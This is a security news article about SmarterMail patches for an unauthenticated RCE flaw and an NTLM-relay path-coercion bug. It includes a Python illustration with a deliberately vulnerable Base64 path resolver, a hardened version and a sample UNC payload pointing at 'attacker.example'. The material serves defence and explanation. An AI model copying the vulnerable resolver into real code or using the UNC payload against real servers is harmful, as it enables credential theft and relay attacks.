SmarterTools has released security updates for its SmarterMail email platform, addressing multiple vulnerabilities, including a critical unauthenticated remote code execution flaw that could allow attackers to run arbitrary commands on affected systems.
The most severe issue is tracked as CVE-2026-24423 and carries a CVSS score of 9.3, placing it in the critical severity band and signalling a high risk to unpatched deployments.
Unauthenticated RCE via ConnectToHub API
According to the official CVE description, SmarterMail versions prior to Build 9511 contain an unauthenticated remote code execution vulnerability in the ConnectToHub API method.
An attacker can exploit the flaw by directing SmarterMail to a malicious HTTP server that delivers a crafted operating system command. Once retrieved, the command is executed by the vulnerable application without requiring authentication, leading to full system compromise.
The vulnerability was discovered and responsibly disclosed by researchers from watchTowr, CODE WHITE GmbH, and VulnCheck, including Sina Kheirkhah, Piotr Bazydlo, Markus Wulftange, and Cale Black.
Additional Critical Vulnerability Under Active Exploitation
SmarterTools confirmed that Build 9511, released on January 15, 2026, also fixes a second critical issue, tracked as CVE-2026-23760 and likewise rated CVSS 9.3. This second flaw has already been observed under active exploitation in real-world attacks, increasing the urgency for administrators to apply the updates.
Medium Severity NTLM Relay Risk Identified
In addition to the critical flaws, SmarterTools addressed a medium-severity vulnerability, CVE-2026-25067, rated CVSS 6.9, which could be abused to perform NTLM relay attacks and unauthorized network authentication.
The issue stems from unauthenticated path coercion in the "background of the day" preview endpoint. The application decodes attacker-controlled Base64 input and uses the result as a filesystem path without proper validation.
On Windows systems, this behavior allows UNC paths to be resolved, forcing the SmarterMail service to initiate outbound SMB authentication requests to attacker-controlled servers. This can be exploited for credential coercion, NTLM relay attacks, and lateral movement within enterprise networks.
VulnCheck noted that this vulnerability significantly increases risk in Windows-based environments where NTLM authentication is still enabled.
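The decode-then-open pattern described above, as an added illustration that is not SmarterMail's code (the product is .NET; this Python models the logic only): a vulnerable resolver that trusts the decoded value beside a hardened one that confines it to a single file name inside a fixed directory. The directory `C:\SmarterMail\Backgrounds`, the function names and the sample inputs are assumptions for the example, not details taken from the product or the advisory.

```python
import base64
import ntpath
import re
from pathlib import PureWindowsPath

# Hypothetical image directory for the example; not SmarterMail's real layout.
BACKGROUND_DIR = r"C:\SmarterMail\Backgrounds"


def vulnerable_resolve(encoded: str) -> str:
    """Mirror the flaw the article describes: decode attacker-controlled
    Base64 and use the result as a filesystem path with no validation.
    A UNC value such as \\\\attacker\\share\\bg.png comes back untouched, so a
    Windows file open (or even an exists() check) on it would make the
    service authenticate to the attacker's SMB server."""
    return base64.b64decode(encoded).decode("utf-8")


def hardened_resolve(encoded: str) -> str:
    """Decode, then constrain the result to one bare file name inside
    BACKGROUND_DIR. Raises ValueError on anything that could reach outside
    it: UNC, device and extended-length prefixes, drive letters, rooted
    paths, traversal segments and NTFS alternate data streams."""
    try:
        raw = base64.b64decode(encoded, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError) as exc:  # binascii.Error is a ValueError
        raise ValueError("malformed Base64 path") from exc
    # Reject \\host\share, \\?\, \\.\ and their forward-slash spellings before
    # any path API touches the value; on Windows the lookup itself coerces auth.
    if raw.startswith(("\\\\", "//", "\\/", "/\\")):
        raise ValueError("UNC or device path rejected")
    p = PureWindowsPath(raw)
    if p.drive or p.root:
        raise ValueError("absolute or rooted path rejected")
    if len(p.parts) != 1 or p.parts[0] in (".", ".."):
        raise ValueError("only a bare file name is accepted")
    # Allow-list the name; ':' is excluded, which also blocks name:stream syntax.
    if not re.fullmatch(r"[A-Za-z0-9_\-]+\.(png|jpg|jpeg)", p.name):
        raise ValueError("file name fails allow-list")
    candidate = ntpath.normpath(ntpath.join(BACKGROUND_DIR, p.name))
    # Defence in depth: confirm the final path still sits under the base directory.
    if ntpath.commonpath([BACKGROUND_DIR, candidate]) != BACKGROUND_DIR:
        raise ValueError("path escapes the background directory")
    return candidate


def encode_path(path: str) -> str:
    """Build a request value the way a client, or an attacker, would."""
    return base64.b64encode(path.encode("utf-8")).decode("ascii")


# Constructed sample inputs (not captured traffic): a benign name and a UNC coercion payload.
BENIGN = encode_path("sunset.png")
UNC_PAYLOAD = encode_path(r"\\attacker.example\share\bg.png")


def check(encoded: str) -> str:
    """Return the hardened result, or the rejection reason, for display."""
    try:
        return hardened_resolve(encoded)
    except ValueError as exc:
        return f"rejected: {exc}"


if __name__ == "__main__":
    for label, value in (("benign", BENIGN), ("unc", UNC_PAYLOAD)):
        print(f"{label:7} vulnerable -> {vulnerable_resolve(value)}")
        print(f"{label:7} hardened   -> {check(value)}")
```

The UNC check runs before any path API is called because, on Windows, resolving or stat-ing `\\host\share\...` is enough to trigger the outbound SMB authentication; validating after a `File.Exists`-style probe would already be too late. The server-side fix does not remove the separate need to restrict or disable NTLM and to enforce SMB signing, which is the environmental risk VulnCheck points to.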
Patch Availability and Security Guidance
The NTLM relay vulnerability has been patched in Build 9518, released on January 22, 2026. With multiple SmarterMail vulnerabilities actively exploited in recent days, SmarterTools strongly advises users to upgrade to the latest available version immediately.
Organizations running SmarterMail instances exposed to the internet are urged to treat these updates as a priority to prevent unauthorized access, system compromise, and credential theft.